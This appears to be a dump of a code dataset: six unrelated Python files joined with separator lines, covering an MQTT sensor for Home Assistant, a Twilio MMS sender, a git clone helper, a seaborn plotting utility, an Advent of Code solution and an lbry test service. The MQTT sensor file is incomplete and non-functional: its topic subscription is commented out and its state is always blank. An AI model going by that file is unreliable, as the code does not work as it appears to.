async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up MQTT sensors dynamically through MQTT discovery."""
async def async_discover_sensor(discovery_payload):
"""Discover and add a discovered MQTT sensor."""
try:
discovery_hash = discovery_payload[ATTR_DISCOVERY_HASH]
config = PLATFORM_SCHEMA(discovery_payload)
await _async_setup_entity(config, async_add_entities, discovery_hash)
except Exception:
if discovery_hash:
clear_discovery_hash(hass, discovery_hash)
raise
async_dispatcher_connect(
hass, MQTT_DISCOVERY_NEW.format(sensor.DOMAIN, "mqtt"), async_discover_sensor
)
async def _async_setup_entity(
config: ConfigType, async_add_entities, discovery_hash=None
):
"""Set up MQTT sensor."""
async_add_entities([MqttSensor(config, discovery_hash)])
class MqttSensor(
MqttAttributes, MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo, Entity
):
"""Representation of a sensor that can be updated using MQTT."""
def __init__(self, config, discovery_hash):
"""Initialize the sensor."""
self._config = config
self._unique_id = config.get(CONF_UNIQUE_ID)
self._state = STATE_UNKNOWN
self._sub_state = None
self._expiration_trigger = None
self._attributes = None
device_config = config.get(CONF_DEVICE)
if config.get(CONF_JSON_ATTRS):
_LOGGER.warning(
'configuration variable "json_attributes" is '
'deprecated, replace with "json_attributes_topic"'
)
MqttAttributes.__init__(self, config)
MqttAvailability.__init__(self, config)
MqttDiscoveryUpdate.__init__(self, discovery_hash, self.discovery_update)
MqttEntityDeviceInfo.__init__(self, device_config)
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await super().async_added_to_hass()
await self._subscribe_topics()
async def discovery_update(self, discovery_payload):
"""Handle updated discovery message."""
config = PLATFORM_SCHEMA(discovery_payload)
self._config = config
await self.attributes_discovery_update(config)
await self.availability_discovery_update(config)
await self._subscribe_topics()
self.async_schedule_update_ha_state()
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
template = self._config.get(CONF_VALUE_TEMPLATE)
if template is not None:
template.hass = self.hass
@callback
def message_received(topic, payload, qos):
"""Handle new MQTT messages."""
global MQTT_DEVICES
"""Handle new MQTT messages."""
try:
message = json.loads(payload)
ip_address = ""
friendly_name = ""
sensors = ""
topic = topic.replace("stat/", "").replace("/STATUS", "")
if "Status" in message:
friendly_name = message.get("Status")["FriendlyName"][0]
elif "StatusNET" in message:
ip_address = message.get("StatusNET")["IPAddress"]
topic = topic[0:-1]
elif "StatusSNS" in message:
sensors = message.get("StatusSNS")
topic = topic[0:-2]
else:
return
# check if device exists in collection
device_not_exist = True
for d in MQTT_DEVICES:
if d["topic"] == topic:
device_not_exist = False
if ip_address != "":
d["IPAddress"] = ip_address
if friendly_name != "":
d["FriendlyName"] = friendly_name
if device_not_exist:
MQTT_DEVICES.append(
{
"topic": topic,
"FriendlyName": friendly_name,
"IPAddress": ip_address,
"Sensors": sensors,
}
)
except Exception as e:
_LOGGER.info("Error: " + str(e))
self.async_schedule_update_ha_state()
# self._sub_state = await subscription.async_subscribe_topics(
# self.hass, self._sub_state,
# {'state_topic': {'topic': self._config.get(CONF_STATE_TOPIC),
# 'msg_callback': message_received,
# 'qos': self._config.get(CONF_QOS)}})
async def async_will_remove_from_hass(self):
"""Unsubscribe when removed."""
self._sub_state = await subscription.async_unsubscribe_topics(
self.hass, self._sub_state
)
await MqttAttributes.async_will_remove_from_hass(self)
await MqttAvailability.async_will_remove_from_hass(self)
@callback
def value_is_expired(self, *_):
"""Triggered when value is expired."""
self._expiration_trigger = None
self._state = STATE_UNKNOWN
self.async_schedule_update_ha_state()
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def name(self):
"""Return the name of the sensor."""
return self._config.get(CONF_NAME)
@property
def unit_of_measurement(self):
"""Return the unit this state is expressed in."""
return self._config.get(CONF_UNIT_OF_MEASUREMENT)
@property
def force_update(self):
"""Force update."""
return self._config.get(CONF_FORCE_UPDATE)
@property
def state(self):
"""Return the state of the entity."""
return " "
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
@property
def unique_id(self):
"""Return a unique ID."""
return self._unique_id
@property
def icon(self):
"""Return the icon."""
return self._config.get(CONF_ICON)
@property
def device_class(self) -> Optional[str]:
"""Return the device class of the sensor."""
return self._config.get(CONF_DEVICE_CLASS)
| StarcoderdataPython |
1652153 | import os
from twilio.rest import Client
def send_mms():
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)
message = client.messages \
.create(
body='I am as cute as baby yoda :)',
media_url='https://helios-i.mashable.com/imagery/articles/06Qx8phppzGdXs2CVE7QlwP/hero-image.fill.size_1248x702.v1623391437.jpg',
from_='+1<YOUR_TWILIO_NUMBER>',
to='+1<TARGET_PHONE_NUMBER>'
)
print(message.sid)
if __name__ == '__main__':
send_mms() | StarcoderdataPython |
7176 | import os
import option
import utility
import grapeMenu
import grapeGit as git
import grapeConfig
class Clone(option.Option):
""" grape-clone
Clones a git repo and configures it for use with git.
Usage: grape-clone <url> <path> [--recursive] [--allNested]
Arguments:
<url> The URL of the remote repository
<path> The directory where you want to clone the repo to.
Options:
--recursive Recursively clone submodules.
--allNested Get all nested subprojects.
"""
def __init__(self):
super(Clone, self).__init__()
self._key = "clone"
self._section = "Getting Started"
#Clones the default repo into a new local repo
def description(self):
return "Clone a repo and configure it for grape"
def execute(self, args):
remotepath = args["<url>"]
destpath = args["<path>"]
rstr = "--recursive" if args["--recursive"] else ""
utility.printMsg("Cloning %s into %s %s" % (remotepath, destpath, "recursively" if args["--recursive"] else ""))
git.clone(" %s %s %s" % (rstr, remotepath, destpath))
utility.printMsg("Clone succeeded!")
os.chdir(destpath)
grapeConfig.read()
# ensure you start on a reasonable publish branch
menu = grapeMenu.menu()
config = grapeConfig.grapeConfig()
publicBranches = config.getPublicBranchList()
if publicBranches:
if "develop" in publicBranches:
initialBranch = "develop"
elif "master" in publicBranches:
initialBranch = "master"
else:
initialBranch = publicBranches[0]
menu.applyMenuChoice("checkout", args=[initialBranch])
if args["--allNested"]:
configArgs = ["--uv","--uvArg=--allNestedSubprojects"]
else:
configArgs = []
return menu.applyMenuChoice("config", configArgs)
def setDefaultConfig(self, config):
pass
| StarcoderdataPython |
4841399 | import numpy as np
import pandas as pd
from pandas.api.types import is_numeric_dtype
import matplotlib.pyplot as plt
from matplotlib import rcParams
import seaborn as sns
from .utils import *
from .utils import _make_iterable, _is_iter
def _plot_grid(plot_func, data, x, y, color=None, **kwargs):
MSG_ONLY_2D = "Only 2 of 3 dimensions can be iterables to create grids: x axis, y axis, or color."
# Determine split_axis
if _is_iter(x):
if _is_iter(y):
assert not _is_iter(color), MSG_ONLY_2D
elif _is_iter(color):
assert not _is_iter(y), MSG_ONLY_2D
else:
return _plot_grid_from_1d(plot_func, data, x, y, color, "x", **kwargs)
return _plot_2d_grid(plot_func, data, x, y, color, **kwargs)
elif _is_iter(y):
if _is_iter(x):
assert not _is_iter(color), MSG_ONLY_2D
elif _is_iter(color):
assert not _is_iter(x), MSG_ONLY_2D
else:
return _plot_grid_from_1d(plot_func, data, x, y, color, "y", **kwargs)
return _plot_2d_grid(plot_func, data, x, y, color, **kwargs)
elif _is_iter(color):
if _is_iter(x):
assert not _is_iter(y), MSG_ONLY_2D
elif _is_iter(y):
assert not _is_iter(x), MSG_ONLY_2D
else:
return _plot_grid_from_1d(plot_func, data, x, y, color, "color", **kwargs)
return _plot_2d_grid(plot_func, data, x, y, color, **kwargs)
else:
return _plot_grid_from_1d(plot_func, data, x, y, [color], "color", **kwargs)
def _plot_grid_from_1d(
plot_func,
data,
x,
y,
color=None,
split_axis="color", # x, y, or color
ncols=4,
zero_line_x=False,
zero_line_y=False,
linewidth=0,
zero_linewidth=1,
legend=True,
legend_prop=None,
palette=None,
sharex=False,
sharey=False,
modifier=None,
**kwargs,
):
x = maybe_factor_indices_to_factors(x)
y = maybe_factor_indices_to_factors(y)
color = maybe_factor_indices_to_factors(color)
# Define the variable for the split
# and plot axes labels
if split_axis == "color":
split_vars = maybe_factor_indices_to_factors(_make_iterable(color))
x_label = x
y_label = y
elif split_axis == "x":
split_vars = maybe_factor_indices_to_factors(_make_iterable(x))
y_label = y
elif split_axis == "y":
split_vars = maybe_factor_indices_to_factors(_make_iterable(y))
x_label = x
# Set default colour to black if none set
if "c" not in kwargs and (color is None or color == [None]):
kwargs["color"] = "black"
legend_str = "brief" if (legend and color is not None) else False
# Figure out rows & columns for the grid with plots
ncols = min(ncols, len(split_vars))
nrows = int(np.ceil(len(split_vars) / ncols))
fig, axes = plt.subplots(
nrows,
ncols,
sharex=sharex,
sharey=sharey,
figsize=(
ncols * rcParams["figure.figsize"][0],
nrows * rcParams["figure.figsize"][1],
),
)
if ncols == 1:
axes = np.array(axes).reshape(-1, 1)
if nrows == 1:
axes = np.array(axes).reshape(1, -1)
for i, split_var in enumerate(split_vars):
color_var = color if split_axis != "color" else split_var
ri = i // ncols
ci = i % ncols
# data_ = data.sort_values(color) if color is not None and color != [None] else data
with sns.axes_style("ticks"), sns.color_palette(palette or "Set2"):
g = plot_func(
x=x if split_axis != "x" else split_var,
y=y if split_axis != "y" else split_var,
data=data,
hue=color_var,
linewidth=linewidth,
legend=legend_str,
palette=palette,
ax=axes[ri, ci],
**kwargs,
)
# Otherwise sns.violinplot still plots the legend
if legend_str is False:
try:
g.get_legend().remove()
except AttributeError:
pass
if modifier:
modifier(split_var=split_var, color_var=color_var, ax=g)
sns.despine(offset=10, trim=True, ax=g)
if split_axis == "x":
x_label = f"Factor{split_var+1}" if isinstance(x, int) else split_var
elif split_axis == "y":
y_label = f"Factor{split_var+1}" if isinstance(y, int) else split_var
g.set(
xlabel=f"{x_label}",
ylabel=f"{y_label}",
title=split_var,
)
if legend and color_var:
if is_numeric_dtype(data[color_var]):
means = data.groupby(color_var)[color_var].mean()
norm = plt.Normalize(means.min(), means.max())
cmap = (
palette
if palette is not None
else sns.cubehelix_palette(as_cmap=True)
)
sm = plt.cm.ScalarMappable(cmap=cmap, norm=norm)
sm.set_array([])
try:
g.figure.colorbar(sm, ax=axes[ri, ci])
g.get_legend().remove()
except Exception:
warn("Cannot make a proper colorbar")
else:
g.legend(
bbox_to_anchor=(1.05, 1),
loc=2,
borderaxespad=0.0,
prop=legend_prop,
)
if zero_line_y:
axes[ri, ci].axhline(
0, ls="--", color="lightgrey", linewidth=zero_linewidth, zorder=0
)
if zero_line_x:
axes[ri, ci].axvline(
0, ls="--", color="lightgrey", linewidth=zero_linewidth, zorder=0
)
# Remove unused axes
for i in range(len(split_vars), ncols * nrows):
ri = i // ncols
ci = i % ncols
fig.delaxes(axes[ri, ci])
plt.tight_layout()
return g
def _plot_2d_grid(*args, **kwargs):
raise NotImplementedError
| StarcoderdataPython |
1765896 | <filename>2017/12.py
#!/usr/bin/env python3
import sys
def dfs(graph, seen, nobe):
if nobe in seen: return
seen.add(nobe)
for child in graph[nobe]:
dfs(graph, seen, child)
def main(args):
data = [s.strip() for s in sys.stdin]
graph = {}
for line in data:
k, vs = line.split(" <-> ")
vs = vs.split(", ")
graph[k] = set(vs)
seen = set()
dfs(graph, seen, "0")
print(len(seen))
num = 1
for k in graph.keys():
if k not in seen: num += 1
dfs(graph, seen, k)
print(num)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| StarcoderdataPython |
3235938 | import asyncio
import logging
from aiohttp.web import Application, WebSocketResponse, json_response
from aiohttp.http_websocket import WSMsgType, WSCloseCode
from lbry.wallet.util import satoshis_to_coins
from .node import Conductor
PORT = 7954
class WebSocketLogHandler(logging.Handler):
def __init__(self, send_message):
super().__init__()
self.send_message = send_message
def emit(self, record):
try:
self.send_message({
'type': 'log',
'name': record.name,
'message': self.format(record)
})
except Exception:
self.handleError(record)
class ConductorService:
def __init__(self, stack: Conductor, loop: asyncio.AbstractEventLoop) -> None:
self.stack = stack
self.loop = loop
self.app = Application()
self.app.router.add_post('/start', self.start_stack)
self.app.router.add_post('/generate', self.generate)
self.app.router.add_post('/transfer', self.transfer)
self.app.router.add_post('/balance', self.balance)
self.app.router.add_get('/log', self.log)
self.app['websockets'] = set()
self.app.on_shutdown.append(self.on_shutdown)
self.handler = self.app.make_handler()
self.server = None
async def start(self):
self.server = await self.loop.create_server(
self.handler, '0.0.0.0', PORT
)
print('serving on', self.server.sockets[0].getsockname())
async def stop(self):
await self.stack.stop()
self.server.close()
await self.server.wait_closed()
await self.app.shutdown()
await self.handler.shutdown(60.0)
await self.app.cleanup()
async def start_stack(self, _):
#set_logging(
# self.stack.ledger_module, logging.DEBUG, WebSocketLogHandler(self.send_message)
#)
self.stack.blockchain_started or await self.stack.start_blockchain()
self.send_message({'type': 'service', 'name': 'blockchain', 'port': self.stack.blockchain_node.port})
self.stack.spv_started or await self.stack.start_spv()
self.send_message({'type': 'service', 'name': 'spv', 'port': self.stack.spv_node.port})
self.stack.wallet_started or await self.stack.start_wallet()
self.send_message({'type': 'service', 'name': 'wallet', 'port': self.stack.wallet_node.port})
self.stack.wallet_node.ledger.on_header.listen(self.on_status)
self.stack.wallet_node.ledger.on_transaction.listen(self.on_status)
return json_response({'started': True})
async def generate(self, request):
data = await request.post()
blocks = data.get('blocks', 1)
await self.stack.blockchain_node.generate(int(blocks))
return json_response({'blocks': blocks})
async def transfer(self, request):
data = await request.post()
address = data.get('address')
if not address and self.stack.wallet_started:
address = await self.stack.wallet_node.account.receiving.get_or_create_usable_address()
if not address:
raise ValueError("No address was provided.")
amount = data.get('amount', 1)
txid = await self.stack.blockchain_node.send_to_address(address, amount)
if self.stack.wallet_started:
await self.stack.wallet_node.ledger.on_transaction.where(
lambda e: e.tx.id == txid and e.address == address
)
return json_response({
'address': address,
'amount': amount,
'txid': txid
})
async def balance(self, _):
return json_response({
'balance': await self.stack.blockchain_node.get_balance()
})
async def log(self, request):
web_socket = WebSocketResponse()
await web_socket.prepare(request)
self.app['websockets'].add(web_socket)
try:
async for msg in web_socket:
if msg.type == WSMsgType.TEXT:
if msg.data == 'close':
await web_socket.close()
elif msg.type == WSMsgType.ERROR:
print('web socket connection closed with exception %s' %
web_socket.exception())
finally:
self.app['websockets'].remove(web_socket)
return web_socket
@staticmethod
async def on_shutdown(app):
for web_socket in app['websockets']:
await web_socket.close(code=WSCloseCode.GOING_AWAY, message='Server shutdown')
async def on_status(self, _):
if not self.app['websockets']:
return
self.send_message({
'type': 'status',
'height': self.stack.wallet_node.ledger.headers.height,
'balance': satoshis_to_coins(await self.stack.wallet_node.account.get_balance()),
'miner': await self.stack.blockchain_node.get_balance()
})
def send_message(self, msg):
for web_socket in self.app['websockets']:
self.loop.create_task(web_socket.send_json(msg))
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.